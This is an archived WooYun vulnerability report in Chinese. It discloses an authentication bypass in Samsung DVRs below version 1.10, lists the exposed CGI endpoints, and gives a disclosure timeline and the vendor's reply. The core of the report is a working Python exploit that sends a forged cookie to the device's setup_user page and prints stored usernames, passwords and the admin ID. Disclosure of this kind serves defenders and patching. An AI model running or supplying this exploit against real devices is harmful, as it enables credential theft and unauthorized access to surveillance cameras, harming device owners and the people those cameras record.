乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-22: 细节已通知厂商并且等待厂商处理中 2013-08-23: 厂商已经确认,细节仅向厂商公开 2013-08-26: 细节向第三方安全合作伙伴开放 2013-10-17: 细节向核心白帽子及相关领域专家公开 2013-10-27: 细节向普通白帽子公开 2013-11-06: 细节向实习白帽子公开 2013-11-20: 细节向公众公开
三星硬盘录像机1.10以下所有版本远程访问权限绕过(附exp),可查本地摄像机配置,内容,登陆账号密码
三星录像机采用linux系统,存在一个外网登陆界面,通过httpd和CGI页面来验证用户cookie,分别为DATA1 DATA2 分为base64位编码的用户名和密码,由于CGI界面的一个错误验证导致cookie为任意参数都可以获取,设置,删除本地用户的用户名,密码cgi-bin/setup_user,设置DVR ,摄像机一般配置,信息的设备,存储,设置的NTP服务器,设置许多其他设置CGIs界面地址:
/cgi-bin/camera_privacy_area/cgi-bin/dev_camera/cgi-bin/dev_devinfo/cgi-bin/dev_devinfo2/cgi-bin/dev_hddalarm/cgi-bin/dev_modechange/cgi-bin/dev_monitor/cgi-bin/dev_pos/cgi-bin/dev_ptz/cgi-bin/dev_remote/cgi-bin/dev_spotout/cgi-bin/event_alarmsched/cgi-bin/event_motion_area/cgi-bin/event_motiondetect/cgi-bin/event_sensordetect/cgi-bin/event_tamper/cgi-bin/event_vldetect/cgi-bin/net_callback/cgi-bin/net_connmode/cgi-bin/net_ddns/cgi-bin/net_event/cgi-bin/net_group/cgi-bin/net_imagetrans/cgi-bin/net_recipient/cgi-bin/net_server/cgi-bin/net_snmp/cgi-bin/net_transprotocol/cgi-bin/net_user/cgi-bin/rec_event/cgi-bin/rec_eventrecduration/cgi-bin/rec_normal/cgi-bin/rec_recopt/cgi-bin/rec_recsched/cgi-bin/restart_page/cgi-bin/setup_admin_setup/cgi-bin/setup_datetimelang/cgi-bin/setup_group/cgi-bin/setup_holiday/cgi-bin/setup_ntp/cgi-bin/setup_systeminfo/cgi-bin/setup_user/cgi-bin/setup_userpwd/cgi-bin/webviewer
py测试源码:
#!/usr/bin/env python##三星testimport urllib2import reimport sys if __name__ == "__main__": if len(sys.argv) != 2: print "usage: %s [TARGET]" % sys.argv[0] sys.exit(1) ip = sys.argv[1] headers = {"Cookie" : "DATA1=YWFhYWFhYWFhYQ==" } print "SAMSUNG DVR Authentication Bypass" print "Vulnerability and exploit by Andrea Fabrizi <[email protected]>\n" print "Target => %s\n" % ip #Dumping users print "##### DUMPING USERS ####" req = urllib2.Request("http://%s/cgi-bin/setup_user" % ip, None, headers) response = urllib2.urlopen(req) user_found = False for line in response.readlines(): exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Name_[0-9]*\' value=\'(.*)\'.*", line) if exp: print exp.group(1), exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Pw_[0-9]*\' value=\'(.*)\'.*", line) if exp: print ": " + exp.group(1) user_found = True exp = re.search(".*<input type=hidden name=\'admin_id\' value=\'(.*)\'.*", line) if exp: print "Admin ID => %s" % exp.group(1) if not user_found: print "No user found."
危害等级:低
漏洞Rank:3
确认时间:2013-08-23 08:58
感谢对三星产品的关注,本漏洞我公司已发现,正在修复中。
暂无